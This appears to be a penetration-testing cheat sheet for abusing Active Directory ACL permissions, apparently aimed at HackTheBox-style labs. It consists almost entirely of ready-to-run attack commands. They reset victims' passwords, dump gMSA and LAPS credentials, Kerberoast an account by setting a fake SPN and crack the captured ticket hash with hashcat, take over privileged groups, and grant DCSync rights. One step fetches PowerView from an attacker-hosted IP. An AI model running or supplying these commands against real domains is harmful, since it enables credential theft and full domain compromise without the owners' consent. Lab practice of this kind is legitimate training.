AD ACL
GenericAll-User
If you have GenericAll access on any user you can reset the password
net user robert FNUEOFNSIDsilfelifsef_1 /domain
From linux
# With password
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123
# With NT HASH
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p ':NTHASH' set password VICTIM Pototo_123
ReadGMSAPassword
You can retrieve hashNT from gmsa accounts
nxc ldap DOMAIN.HTB -u 'USER' -p 'PASS' --gmsa
WriteSPN
sudo wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 /var/www/html/PowerView.ps1
wget http://10.10.14.81/PowerView.ps1 -O PowerView.ps1
. .\PowerView.ps1
Set-DomainObject -Identity VICTIM -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainSPNTicket nonexistent/BLAHBLAH | fl
Set-DomainObject -Identity VICTIM -Clear serviceprincipalname
cat <<'EOF'>/tmp/hash
$krb5tgs$23$*UNKNOWN$UNKNOWN$nonexistent/BLAHBLAH*$E8249E3FFA2B2AB9026CC37C0562FB5F$3ED78929B67711ECE475772A7638C5A5EAC249C47BC3873F9D7251C5783D9E4ACDF3D401A341FB288F1660564AD5BFA455482FCC6F1300A1758992B978D5692434875F8BC73EAFA81EB748E698283664ABEE0837D8C43267CBF0716981E3FA1F8A94A27FA936FA3D2F05C215B6993E9356FE06A6163B1D7FF56B92E9990A3F07C9A96AC808A1645F2406B4585BA233D3BFF8A0EA8A13AE594D010A1F37BA6F1BAD160718408897C26115DE5973C381C0BCEC96B7C946B32ED9B679B2A2E129432AE4CEC9EE91F82407AF911B56068BA5B017E6E87F5FDB7D15867B61EF2FEB60000D0D85DCCFDA95A68C8771B3762E3E7904278701CF4CE8AAC71043133EE00149F51DD96A6387472171BA8A5E75B3C1B851EDD4646F38ECB5BC03A9786A0DE2C36A8803E9A173C86C3237ADB7727575BEF1FE63238064B0B38B7BDEE107DEB757BB009D61589E64FA94848D6FBE1CFFF20A6F9D6E81B7E2AD05E08F2981F14A275884B35B03AD65F1B030224EA8B3868754823B310155F5BE3A669F43A0E3A8EE8F729479ED259A8A5F829DA4F6E049F578931BFEAF25B505D63B70D4B4659CE80108A0E0E2005139351E2A02D378AC4A17381340CE76DC088EB763C91D3DC2081CCCC9F67B0C4CBD26744CF9555F71C3AB8E716BDD865D396A79937296E0308C56A5F8879604A6CA915D773263F1B8E6273CC1F6C9B1D0092EE2E4F41AB81B912658EC610F1A417F49D4A4F80349AC15FBAD1B6CC09714924CFA2D7EDBD3B6FD0249BFCC7F59BE576DF933BB0C4649AF7A96D007BF573F6D1991DA909F657F4279378FDD46528CCA30F160A5B3BECF90125298A73A6051F9377F52D868BF9A108236CFC7F79DF70F612836702206F8F31D20109B265E17B398DD9E954EE55FA8104D4B76EBDB294855ECB7D1530520B01F4639966E5263865CC3C15B43B7107FFFF713CA75C26AED1E64C612B16BC13AEA23DDA30295BA07DE13EED6E02EAEAA8B5D376A3BBF765C2648A01AB8DA35EBE3CBDADCD034533242EB0D6EDF4844BE2A48C4EA4585384B7862DB167C49290C7A6F8C7657A13DD6D0864B22D73F4064CC64E600616E8F190DA03885A3935717A64611DE4CB4876060772678BBAED6DB434A72795A7597B731EF7F87C939791C37FC4DA4B5912A282E171E040AC106B9923162A944463415C4F9F4F472C924B7C20E11C9C4265B9079039E43B9A89EC62362DC8BDF5DCA33388ED53B0872A9A0395110F30C78442CC3CEE5A86F101C3D92541C26793EF30A0B77503BD3CD7E69AAB3D164DBBF231BF8D03ED15B1EA9D5499AC5B2C11457BEEC973229255B810514F7FBB8E167AC6726A24FDEB6FCFF58156D4402FBCF3439753A2AAD0A1B0C752058113AC1D4F5A5876326076DB32D9342E532F2BDBEA77D0DB578AF813C99C871657930FF36A57ADE6A9570818A0B5E37A1AEB5EE4957761B047A1FA2DD12DFA06B9E08E40CF84156271635D75B9504CE24B00084FB1180934531EE8419916D7DB18AEF19F60A167D8DE2B30CC334B5AC8A192011EDA4C289816AA47DDBB2EF92FB02E685EF6195A272D3957FDF4F26F8877D43CB5553F2EE9F776F6AC9B00B887099883A1D94D49A93A428E43246AF8682F8E44C9FF6EE831BA955B87B3536A9CF7A78F6CD134B67A010FC023CDFEEE1D936B2483C92FBA7A2B29C3F3FE55ED764611913429F0BFBEAE2661DC86E21EE866B47901B2D55F72CDA04A38301BFF59EA5085F1D860AA90DD7708D6A052D83CDECD563EBC8
EOF
hashcat -m 13100 -a 0 /tmp/hash /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --potfile-path=/home/user/HASHCATPOT
WriteOwner-Group
Change owner of group
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner 'TheSuperAdminGroup' 'USER'
Owner-Group
Grant genericAll right to TheSuperAdminGroup for USER
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll 'TheSuperAdminGroup' 'USER'
GenericAll-Group
Add USER to group
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add groupMember 'TheSuperAdminGroup' 'USER'
ReadLAPSPassword
nxc ldap 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' --module laps
WriteDacl
You can add any ACL you want, like DCSync
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' setDCSync USER